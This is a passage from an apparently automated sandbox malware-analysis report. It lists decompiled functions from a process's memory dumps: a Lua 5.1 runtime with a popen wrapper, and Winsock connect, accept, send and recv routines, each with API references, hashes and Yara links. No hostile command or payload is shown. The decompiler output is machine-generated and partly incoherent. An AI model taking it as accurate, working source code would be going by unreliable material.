				if(_t27 == 0 || E10001770(_t20, _t44, _a4, 0xffffffff) > 0) {
					return 1;
				} else {
					return 0;
				}
			}

0x10012800
0x10012804
0x10012814
0x10012819
0x10012826
0x1001282d
0x10012830
0x10012835
0x1001283a
0x1001283f
0x10012844
0x10012846
0x10012846
0x1001284d
0x10012853
0x10012858
0x1001285a
0x1001285a
0x10012869
0x10012871
0x10012876
0x10012877
0x100128a3
0x1001288f
0x10012897
0x10012897

APIs

luaL_buffinit.LUA5.1(000000FF,?,00000000,?,?,?), ref: 10012814
luaL_prepbuffer.LUA5.1(?,?,?), ref: 1001283A
fread.MSVCRT ref: 1001284D
luaL_pushresult.LUA5.1(?), ref: 10012869
lua_objlen.LUA5.1(?,000000FF), ref: 10012883

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_buffinit.L_prepbuffer.L_pushresult.freadlua_objlen.
String ID:
API String ID: 4242377137-0
Opcode ID: e489b6195f4aeeb043b24270fe76e134f1e3a3b264eab297ca5676deef50e791
Instruction ID: 4ad5be1291d39b8c732e7b26d290fc9dd5cd2e1c0f2c4f5705421a37dc1118cf
Opcode Fuzzy Hash: e489b6195f4aeeb043b24270fe76e134f1e3a3b264eab297ca5676deef50e791
Instruction Fuzzy Hash: 1E0104F690434067E720D624EC85B7F77D8EBC4394F540A28FD6883246EA35E95482A2

Uniqueness

Uniqueness Score: -1.00%

Function 00994240, Relevance: 6.1, APIs: 4, Instructions: 59
networkCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00994240(signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				signed int _v28;
				signed int _t13;
				signed int* _t19;
				signed int* _t23;

				_t23 = _a4;
				_t13 =  *_t23;
				if(_t13 != 0xffffffff) {
					_push(_a12);
					_push(_a8);
					_push(_t13); // executed
					L00994A76(); // executed
					if(_t13 != 0) {
						L00994A52();
						_v8 = _t13;
						if(_t13 == 0x2733 || _t13 == 0x2734) {
							_t19 = _a4;
							asm("fcomp qword [0x995168]");
							asm("fnstsw ax");
							if((_t13 & 0x00000040) == 0) {
								_t13 = E00993FE0(_t23, 6, _t19);
								_v8 = _t13;
								if(_t13 == 0xfffffffe) {
									_v0 = 4;
									Sleep(0xa);
									_push( &_v0);
									_push( &_v8);
									_push(0x1007);
									_push(0xffff);
									_push( *_t23);
									L00994A70();
									_t13 = _v28;
									if(_t13 <= 0) {
										return 0xfffffffd;
									}
								}
								goto L11;
							} else {
								return _t13 | 0xffffffff;
							}
						} else {
							L11:
							return _t13;
						}
					} else {
						return _t13;
					}
				} else {
					return 0xfffffffe;
				}
			}

0x00994241
0x00994245
0x0099424a
0x0099425b
0x0099425c
0x0099425d
0x0099425e
0x00994265
0x00994269
0x00994273
0x00994277
0x00994280
0x00994286
0x0099428c
0x00994291
0x0099429c
0x009942a7
0x009942ab
0x009942af
0x009942b7
0x009942c7
0x009942c8
0x009942c9
0x009942ce
0x009942d3
0x009942d4
0x009942d9
0x009942df
0x00000000
0x009942e1
0x009942df
0x00000000
0x00994293
0x00994297
0x00994297
0x009942e7
0x009942e7
0x009942e7
0x009942e7
0x00994268
0x00994268
0x00994268
0x0099424c
0x00994252
0x00994252

APIs

connect.WSOCK32(?,?,00000010), ref: 0099425E

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: connect
String ID:
API String ID: 1959786783-0
Opcode ID: 0ba00699e05f7745fc92ee8b862f896047ee6bcae7ac403a4585af950a13c686
Instruction ID: a382a48a64dfacb176856adfabb4c91743bc98b0897e115eae9a36facd0e4731
Opcode Fuzzy Hash: 0ba00699e05f7745fc92ee8b862f896047ee6bcae7ac403a4585af950a13c686
Instruction Fuzzy Hash: 1D11737060C6026BDE21DB2CE945E6F7798AFC1764F104B19F5B48A2D4E770DC428792

Uniqueness

Uniqueness Score: -1.00%

Function 00994370, Relevance: 4.6, APIs: 3, Instructions: 61
networkCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00994370(intOrPtr* _a4, signed int _a8, char* _a12, char* _a16) {
				intOrPtr* _v4;
				char _v16;
				char _v20;
				intOrPtr _t9;
				char* _t13;
				char* _t15;
				intOrPtr* _t16;
				intOrPtr* _t17;
				void* _t18;

				_t18 =  &_v20;
				_t16 = _a4;
				_v20 = 0x10;
				_t9 =  *_t16;
				if(_t9 != 0xffffffff) {
					_t13 = _a12;
					if(_t13 == 0) {
						_t13 =  &_v16;
					}
					_t15 = _a16;
					if(_t15 == 0) {
						_t15 =  &_v20;
					}
					_push(_t15);
					_push(_t13);
					_push(_t9); // executed
					L00994A88(); // executed
					_t17 = _v4;
					 *_t17 = _t9;
					if(_t9 != 0xffffffff) {
						L11:
						return 0;
					} else {
						goto L7;
					}
					while(1) {
						L7:
						L00994A52();
						if(_t9 != 0x2733 && _t9 != 0x2745) {
							break;
						}
						_t9 = E00993FE0(_t16, 1, _a8);
						_t18 = _t18 + 0xc;
						if(_t9 == 0) {
							_push(_t15);
							_push(_t13);
							_push( *_t16); // executed
							L00994A88(); // executed
							 *_t17 = _t9;
							if(_t9 == 0xffffffff) {
								continue;
							} else {
								goto L11;
							}
							goto L13;
						}
						break;
					}
					return _t9;
				} else {
					return 0xfffffffe;
				}
				L13:
			}

0x00994370
0x00994376
0x0099437b
0x00994383
0x00994388
0x00994397
0x0099439d
0x0099439f
0x0099439f
0x009943a3
0x009943a9
0x009943ab
0x009943ab
0x009943af
0x009943b0
0x009943b1
0x009943b2
0x009943b7
0x009943be
0x009943c1
0x009943fc
0x00000000
0x00000000
0x00000000
0x00000000
0x009943c3
0x009943c3
0x009943c3
0x009943cd
0x00000000
0x00000000
0x009943de
0x009943e3
0x009943e8
0x009943ec
0x009943ed
0x009943ee
0x009943ef
0x009943f7
0x009943fa
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x009943fa
0x00000000
0x009943e8
0x00994405
0x0099438d
0x00994396
0x00994396
0x00000000

APIs

accept.WSOCK32(00000000,?,?), ref: 009943B2
WSAGetLastError.WSOCK32(00000000,?,00000010), ref: 009943C3
accept.WSOCK32(?,?,?), ref: 009943EF

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: accept$ErrorLast
String ID:
API String ID: 1462533708-0
Opcode ID: 2a7258820243ad6152aa7f02eb56d448d06718df463d8a5aa66c6ee9269d2e87
Instruction ID: 4307baa28b3e0a1d4600e4752d975cec4b64caff8a84954f39b080524863a6d6
Opcode Fuzzy Hash: 2a7258820243ad6152aa7f02eb56d448d06718df463d8a5aa66c6ee9269d2e87
Instruction Fuzzy Hash: 3B11C27264034067DF21EE7C9D82D5B73ACEBC4374F900B29F96083190E725DD4A4762

Uniqueness

Uniqueness Score: -1.00%

Function 00994520, Relevance: 4.6, APIs: 3, Instructions: 53
networkCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00994520(signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr* _v0;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t15;
				intOrPtr* _t17;
				signed int _t18;
				void* _t19;
				intOrPtr _t21;

				_t17 = _a4;
				 *_a16 = 0;
				_t8 =  *_t17;
				if(_t8 == 0xffffffff) {
					L8:
					_t8 = 0xfffffffe;
					goto L9;
				} else {
					_t15 = _a12;
					_t10 = _a8;
					_push(0);
					_push(_t15);
					_push(_t10);
					_push(_t8); // executed
					L00994A9A(); // executed
					_t21 = _t8;
					if(_t21 > 0) {
						L7:
						 *_v0 = _t8;
						return 0;
					} else {
						_t18 = _a4;
						while(_t21 != 0) {
							L00994A52();
							if(_t8 != 0x2733) {
								L9:
								return _t8;
							} else {
								_t8 = E00993FE0(_t17, 1, _t18);
								_t19 = _t19 + 0xc;
								if(_t8 != 0) {
									goto L9;
								} else {
									_push(_t8);
									_push(_t15);
									_push(_t10);
									_push( *_t17); // executed
									L00994A9A(); // executed
									if(_t8 <= 0) {
										continue;
									} else {
										goto L7;
									}
								}
							}
							goto L10;
						}
						goto L8;
					}
				}
				L10:
			}

0x00994527
0x0099452b
0x00994532
0x00994537
0x0099458d
0x0099458d
0x00000000
0x00994539
0x00994539
0x0099453d
0x00994541
0x00994543
0x00994544
0x00994545
0x00994546
0x0099454b
0x0099454d
0x00994580
0x00994587
0x0099458c
0x0099454f
0x0099454f
0x00994553
0x00994555
0x0099455f
0x00994592
0x00994596
0x00994561
0x00994565
0x0099456a
0x0099456f
0x00000000
0x00994571
0x00994573
0x00994574
0x00994575
0x00994576
0x00994577
0x0099457e
0x00000000
0x00000000
0x00000000
0x00000000
0x0099457e
0x0099456f
0x00000000
0x0099455f
0x00000000
0x00994553
0x0099454d
0x00000000

APIs

#16.WSOCK32(00000000,00000000,00993AB5,00000000,?,00000000,00000008,00000000,00993AB5,00000000,?,00000000,?,00000008,00000008), ref: 00994546
WSAGetLastError.WSOCK32(00000000,00000000,00993AB5,00000000,?,00000000,00000008,00000000,00993AB5,00000000,?,00000000,?,00000008,00000008), ref: 00994555
#16.WSOCK32(?,00000000,00993AB5,00000000,?,00000008,00000008), ref: 00994577

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: ea393d2b268f888fc6993a91ebcf0250094ff3b44113fd35f46012b13dab9af8
Instruction ID: 7944794e6c2b54b60e3759f04b610a0f5d3c5c7ecf55bf514d47eb62f7e12244
Opcode Fuzzy Hash: ea393d2b268f888fc6993a91ebcf0250094ff3b44113fd35f46012b13dab9af8
Instruction Fuzzy Hash: 6E018F722053016BEE21DEADDC41F2BB3ECEFC5365F160A26F964C3281D721EC068662

Uniqueness

Uniqueness Score: -1.00%

Function 00994410, Relevance: 4.6, APIs: 3, Instructions: 52
networkCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00994410(signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr* _v0;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t14;
				intOrPtr* _t17;
				signed int _t18;
				void* _t19;

				_t17 = _a4;
				 *_a16 = 0;
				_t8 =  *_t17;
				if(_t8 != 0xffffffff) {
					_t14 = _a12;
					_t10 = _a8;
					_push(0);
					_push(_t14);
					_push(_t10);
					_push(_t8); // executed
					L00994A8E(); // executed
					if(_t8 > 0) {
						L7:
						 *_v0 = _t8;
						_t8 = 0;
					} else {
						_t18 = _a4;
						while(1) {
							L00994A52();
							if(_t8 != 0x2733) {
								goto L8;
							}
							_t8 = E00993FE0(_t17, 2, _t18);
							_t19 = _t19 + 0xc;
							if(_t8 == 0) {
								_push(_t8);
								_push(_t14);
								_push(_t10);
								_push( *_t17);
								L00994A8E();
								if(_t8 <= 0) {
									continue;
								} else {
									goto L7;
								}
							}
							goto L8;
						}
					}
					L8:
					return _t8;
				} else {
					return 0xfffffffe;
				}
			}

0x00994417
0x0099441b
0x00994422
0x00994427
0x00994433
0x00994437
0x0099443b
0x0099443d
0x0099443e
0x0099443f
0x00994440
0x00994447
0x00994478
0x0099447c
0x0099447e
0x00994449
0x00994449
0x0099444d
0x0099444d
0x00994457
0x00000000
0x00000000
0x0099445d
0x00994462
0x00994467
0x0099446b
0x0099446c
0x0099446d
0x0099446e
0x0099446f
0x00994476
0x00000000
0x00000000
0x00000000
0x00000000
0x00994476
0x00000000
0x00994467
0x0099444d
0x00994480
0x00994484
0x00994429
0x00994432
0x00994432

APIs

send.WSOCK32(?,?,?,00000000), ref: 00994440
WSAGetLastError.WSOCK32(00000000,?,00000000,00000008,009938CC,00000000,00000000,?,?,00000008,00000008), ref: 0099444D
send.WSOCK32(?,?,?,00000000), ref: 0099446F

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: send$ErrorLast
String ID:
API String ID: 2200680727-0
Opcode ID: f9400d50e3f443906086d3934821a862e90cf64b57206cacc83af9f029a2f15d
Instruction ID: 2b0e2a30d1436c6302d4b2b5c092612e864c53b97bd73ad8d41eb1f2d8f86d02
Opcode Fuzzy Hash: f9400d50e3f443906086d3934821a862e90cf64b57206cacc83af9f029a2f15d
Instruction Fuzzy Hash: 0A0162B22053056BEA21DE6DDC41F1BB3ECEFC57A8F150A25F950D7291D321EC024B62

Uniqueness

Uniqueness Score: -1.00%

Function 10012230, Relevance: 4.5, APIs: 3, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10012230(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
				char* _t2;
				char* _t3;
				intOrPtr* _t4;
				intOrPtr* _t5;

				_t11 = _a4;
				_t2 = E1000F4A0(__eflags, _a4, 1, 0);
				_t10 = _t2;
				_t3 = E1000F4E0(__ecx, __eflags, _a4, 2, "r", 0);
				_t4 = E100121F0(_t11);
				_t5 = _popen(_t2, _t3); // executed
				 *_t4 = _t5;
				if(_t5 != 0) {
					return 1;
				} else {
					return E10012160(_t5, __fp0, _t11, _t5, _t10);
				}
			}

0x10012233
0x1001223d
0x1001224c
0x1001224e
0x10012256
0x1001225f
0x10012268
0x1001226d
0x10012288
0x1001226f
0x1001227e
0x1001227e

APIs

luaL_checklstring.LUA5.1(?,00000001,00000000), ref: 1001223D

Part of subcall function 1000F4A0: lua_tolstring.LUA5.1(?,?,?,?,?,?,1000F292,?,?,00000000), ref: 1000F4B2

luaL_optlstring.LUA5.1(?,00000002,10019B5C,00000000,?,00000001,00000000), ref: 1001224E

Part of subcall function 1000F4E0: lua_type.LUA5.1(?,?,?,?,1000F27E,?,?,?,00000000), ref: 1000F4EC

Part of subcall function 100121F0: lua_newuserdata.LUA5.1(?,00000004,?,?,10012D5C,?,?,?,10012BF3,?,75974600,00000001,stdin,?,1001A2F0,10017718), ref: 100121F9
Part of subcall function 100121F0: lua_getfield.LUA5.1(?,FFFFD8F0,FILE*,?,00000004,?,?,10012D5C,?,?,?,10012BF3,?,75974600,00000001,stdin), ref: 10012211
Part of subcall function 100121F0: lua_setmetatable.LUA5.1(?,000000FE,?,FFFFD8F0,FILE*,?,00000004,?,?,10012D5C,?,?,?,10012BF3,?,75974600), ref: 10012219

_popen.MSVCRT ref: 1001225F

Part of subcall function 10012160: _errno.MSVCRT ref: 10012161
Part of subcall function 10012160: lua_pushboolean.LUA5.1(?,00000001), ref: 10012178

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checklstring.L_optlstring._errno_popenlua_getfield.lua_newuserdata.lua_pushboolean.lua_setmetatable.lua_tolstring.lua_type.
String ID:
API String ID: 2141765425-0
Opcode ID: 1b9f9a8203b717d7f9cdbdccf713ab9f45626a77267ce9015653296654bca36f
Instruction ID: 3a763aaa4a24b51fe25d752ee69d6ebfa6f7346967f013181f491545304336d5
Opcode Fuzzy Hash: 1b9f9a8203b717d7f9cdbdccf713ab9f45626a77267ce9015653296654bca36f
Instruction Fuzzy Hash: 87F0A77674131437E61092796C46F9B739CDF966A5F004026F704EA142D6B1E85012B4

Uniqueness

Uniqueness Score: -1.00%

Function 10005380, Relevance: 3.2, APIs: 2, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E10005380(void* __ebx) {
				intOrPtr* _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr* _t72;
				intOrPtr _t91;
				intOrPtr* _t92;
				intOrPtr _t102;
				void* _t104;
				intOrPtr _t105;
				intOrPtr _t106;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr _t129;
				void* _t143;
				intOrPtr _t145;
				intOrPtr _t148;
				intOrPtr _t151;
				void* _t155;
				void* _t170;

				_t104 = __ebx;
				_t69 =  *((intOrPtr*)(_t155 + 8));
				_t148 =  *((intOrPtr*)(_t155 + 8));
				if( *((intOrPtr*)(_t69 + 8)) != 6) {
					_t69 = E10005720(_t148, _t69);
					_t155 = _t155 + 8;
				}
				_t70 =  *_t69;
				_t143 = _t69 -  *((intOrPtr*)(_t148 + 0x20));
				 *((intOrPtr*)( *((intOrPtr*)(_t148 + 0x14)) + 0xc)) =  *((intOrPtr*)(_t148 + 0x18));
				if( *((intOrPtr*)(_t70 + 6)) != 0) {
					if( *((intOrPtr*)(_t148 + 0x1c)) -  *((intOrPtr*)(_t148 + 8)) <= 0x140) {
						E10005280(_t148, 0x14);
						_t155 = _t155 + 8;
					}
					_t71 =  *((intOrPtr*)(_t148 + 0x14));
					if(_t71 !=  *((intOrPtr*)(_t148 + 0x24))) {
						_t72 = _t71 + 0x18;
						 *((intOrPtr*)(_t148 + 0x14)) = _t72;
					} else {
						_t72 = E10005560(_t148);
						_t155 = _t155 + 4;
					}
					_t113 = _t143 +  *((intOrPtr*)(_t148 + 0x20));
					 *((intOrPtr*)(_t72 + 4)) = _t113;
					_t114 = _t113 + 0x10;
					 *_t72 = _t114;
					 *((intOrPtr*)(_t148 + 0xc)) = _t114;
					 *((intOrPtr*)(_t72 + 0x10)) =  *((intOrPtr*)(_t155 + 0x14));
					 *((intOrPtr*)(_t72 + 8)) =  *((intOrPtr*)(_t148 + 8)) + 0x140;
					if(( *(_t148 + 0x36) & 0x00000001) != 0) {
						E100052B0(_t148, 0, 0xffffffff);
						_t155 = _t155 + 0xc;
					}
					_push(_t148);
					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t148 + 0x14)) + 4)))) + 0x10))() >= 0) {
						E100057C0(_t148,  *((intOrPtr*)(_t148 + 8)) - (_t75 << 4));
						return 1;
					} else {
						return 2;
					}
				} else {
					_push(_t104);
					_t105 =  *((intOrPtr*)(_t70 + 0x10));
					 *((intOrPtr*)(_t155 + 0x18)) = _t105;
					if( *((intOrPtr*)(_t148 + 0x1c)) -  *((intOrPtr*)(_t148 + 8)) <= 0 << 4) {
						E10005280(_t148, 0);
						_t155 = _t155 + 8;
					}
					_t151 = _t143 +  *((intOrPtr*)(_t148 + 0x20));
					if( *((intOrPtr*)(_t105 + 0x4a)) != 0) {
						_t106 = E100055C0(_t170, _t148, _t105, ( *((intOrPtr*)(_t148 + 8)) - _t151 >> 4) - 1);
						_t155 = _t155 + 0xc;
						_t151 = _t143 +  *((intOrPtr*)(_t148 + 0x20));
						_t145 =  *((intOrPtr*)(_t155 + 0x18));
					} else {
						_t145 =  *((intOrPtr*)(_t155 + 0x18));
						_t106 = _t151 + 0x10;
						_t102 = (0 << 4) + _t106;
						if( *((intOrPtr*)(_t148 + 8)) > 0 << 4) {
							 *((intOrPtr*)(_t148 + 8)) = _t102;
						}
					}
					_t91 =  *((intOrPtr*)(_t148 + 0x14));
					if(_t91 !=  *((intOrPtr*)(_t148 + 0x24))) {
						_t92 = _t91 + 0x18;
						 *((intOrPtr*)(_t148 + 0x14)) = _t92;
					} else {
						_t92 = E10005560(_t148);
						_t155 = _t155 + 4;
					}
					 *((intOrPtr*)(_t92 + 4)) = _t151;
					 *_t92 = _t106;
					 *((intOrPtr*)(_t148 + 0xc)) = _t106;
					 *((intOrPtr*)(_t92 + 8)) = (0 << 4) + _t106;
					 *((intOrPtr*)(_t148 + 0x18)) =  *((intOrPtr*)(_t145 + 0xc));
					 *((intOrPtr*)(_t92 + 0x14)) = 0;
					 *((intOrPtr*)(_t92 + 0x10)) =  *((intOrPtr*)(_t155 + 0x1c));
					_t129 =  *((intOrPtr*)(_t148 + 8));
					while(_t129 <  *((intOrPtr*)(_t92 + 8))) {
						 *((intOrPtr*)(_t129 + 8)) = 0;
						_t129 = _t129 + 0x10;
					}
					 *((intOrPtr*)(_t148 + 8)) =  *((intOrPtr*)(_t92 + 8));
					if(( *(_t148 + 0x36) & 0x00000001) != 0) {
						 *((intOrPtr*)(_t148 + 0x18)) =  *((intOrPtr*)(_t148 + 0x18)) + 4;
						E100052B0(_t148, 0, 0xffffffff);
						 *((intOrPtr*)(_t148 + 0x18)) =  *((intOrPtr*)(_t148 + 0x18)) + 0xfffffffc;
					}
					return 0;
				}
			}

0x10005380
0x10005380
0x10005385
0x1000538e
0x10005392
0x10005397
0x10005397
0x100053a2
0x100053a4
0x100053a9
0x100053b1
0x100054c5
0x100054ca
0x100054cf
0x100054cf
0x100054d2
0x100054da
0x100054e7
0x100054ea
0x100054dc
0x100054dd
0x100054e2
0x100054e2
0x100054f0
0x100054f7
0x100054fa
0x100054fd
0x100054ff
0x10005505
0x1000550e
0x10005516
0x1000551d
0x10005522
0x10005522
0x10005528
0x10005536
0x1000554a
0x10005559
0x10005539
0x1000553f
0x1000553f
0x100053b7
0x100053bd
0x100053be
0x100053cb
0x100053d4
0x100053d8
0x100053dd
0x100053dd
0x100053e8
0x100053ec
0x1000541c
0x10005421
0x10005426
0x10005428
0x100053ee
0x100053ee
0x100053f7
0x10005400
0x10005404
0x10005406
0x10005406
0x10005404
0x1000542c
0x10005434
0x10005441
0x10005444
0x10005436
0x10005437
0x1000543c
0x1000543c
0x10005447
0x1000544a
0x1000544e
0x10005459
0x10005463
0x1000546b
0x1000546e
0x10005471
0x10005476
0x10005478
0x1000547e
0x10005481
0x10005488
0x10005490
0x1000549c
0x1000549f
0x100054ad
0x100054ad
0x100054b6
0x100054b6

APIs

luaD_growstack.LUA5.1(?,?,?,?,?,?,100058E3,?,00000000,?,?,1000D397,?,?,00000001,?), ref: 100053D8

Part of subcall function 10005720: luaD_growstack.LUA5.1(?,00000001,00000000,?,?,?,?,0000000F,?,?,00000002,?,?), ref: 1000578C

Part of subcall function 100055C0: luaS_newlstr.LUA5.1(?,100191FC,00000001,?,?,?,00000000,?,?,?,?,0000000F,?,?,00000002,?), ref: 100056A3

luaD_growstack.LUA5.1(?,00000014,?,?,100058E3,?,00000000,?,?,1000D397,?,?,00000001,?,?,1000DAED), ref: 100054CA

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: D_growstack.$S_newlstr.
String ID:
API String ID: 2626842547-0
Opcode ID: 17421fc5a16f71d554b5809329acc4d5891ae48adf4cfbc316a80af513db4be3
Instruction ID: e184185b7454955c6c84427ec393a5ac30eff78feb548041c94428ece2f973c3
Opcode Fuzzy Hash: 17421fc5a16f71d554b5809329acc4d5891ae48adf4cfbc316a80af513db4be3
Instruction Fuzzy Hash: 5A6136B5600B008FE324CF29D89096BB7F1FF89345B15862CE48A87726E731F945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00993F80, Relevance: 3.0, APIs: 2, Instructions: 27
networkCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00993F80() {
				intOrPtr* _t1;
				intOrPtr _t3;
				intOrPtr* _t9;

				_t1 = _t9;
				_push(_t1);
				_push(2); // executed
				L00994A4C(); // executed
				if(_t1 != 0) {
					L4:
					return 0;
				} else {
					_t3 =  *_t9;
					if(_t3 != 2) {
						if(_t3 != 1 || _t3 != _t3) {
							goto L3;
						} else {
							goto L7;
						}
					} else {
						if(_t3 == 0) {
							L7:
							return 1;
						} else {
							L3:
							L00994A46();
							goto L4;
						}
					}
				}
			}

0x00993f86
0x00993f8a
0x00993f8b
0x00993f8d
0x00993f94
0x00993fac
0x00993fb4
0x00993f96
0x00993f96
0x00993f9d
0x00993fb7
0x00000000
0x00000000
0x00000000
0x00000000
0x00993f9f
0x00993fa5
0x00993fc1
0x00993fcc
0x00993fa7
0x00993fa7
0x00993fa7
0x00000000
0x00993fa7
0x00993fa5
0x00993f9d

APIs

WSAStartup.WSOCK32(00000002), ref: 00993F8D
WSACleanup.WSOCK32 ref: 00993FA7

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: CleanupStartup
String ID:
API String ID: 915672949-0
Opcode ID: d3104da094db48f15728ce6ef756ec913b760ef4086ca7d835e3485bd46d7896
Instruction ID: b2f248ff8751a18c0b11501f33f10feb584d62c9258b2466a193df0fc28105ee
Opcode Fuzzy Hash: d3104da094db48f15728ce6ef756ec913b760ef4086ca7d835e3485bd46d7896
Instruction Fuzzy Hash: A6E0DF64D9010016FF666A6C5422BF713AE1B98300FC48064B848C3281FA2ACA4E4056

Uniqueness

Uniqueness Score: -1.00%

Function 10010090, Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

free.MSVCRT(?), ref: 1001009D
realloc.MSVCRT ref: 100100AF

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: freerealloc
String ID:
API String ID: 786099813-0
Opcode ID: 40fd9e2cd0bf85e0ea9bccb093e093950441798bc4d91a4fb941f470ad60bd9c
Instruction ID: 6547882ae7c61952b437aafe81ccd9b06673fd920de3c4d36674be54a85d3430
Opcode Fuzzy Hash: 40fd9e2cd0bf85e0ea9bccb093e093950441798bc4d91a4fb941f470ad60bd9c
Instruction Fuzzy Hash: 1FD092B4B14302EBE701DB74EC8891B76E8BF88245F448868F589C3110EA35D9588A22

Uniqueness

Uniqueness Score: -1.00%

Function 100164D0, Relevance: 3.0, APIs: 2, Instructions: 13fileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT ref: 100164DA
fclose.MSVCRT ref: 100164E9

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: fclosefopen
String ID:
API String ID: 1280645193-0
Opcode ID: d03af9d1ae75d77d7212938322fd9a1b41951e3d2c98b886ffaf4f5f32a9ba62
Instruction ID: 7d17f3ccb6be49f016fbf75a5b9104446d4abd8d85c2d8033235e6eb239dc439
Opcode Fuzzy Hash: d03af9d1ae75d77d7212938322fd9a1b41951e3d2c98b886ffaf4f5f32a9ba62
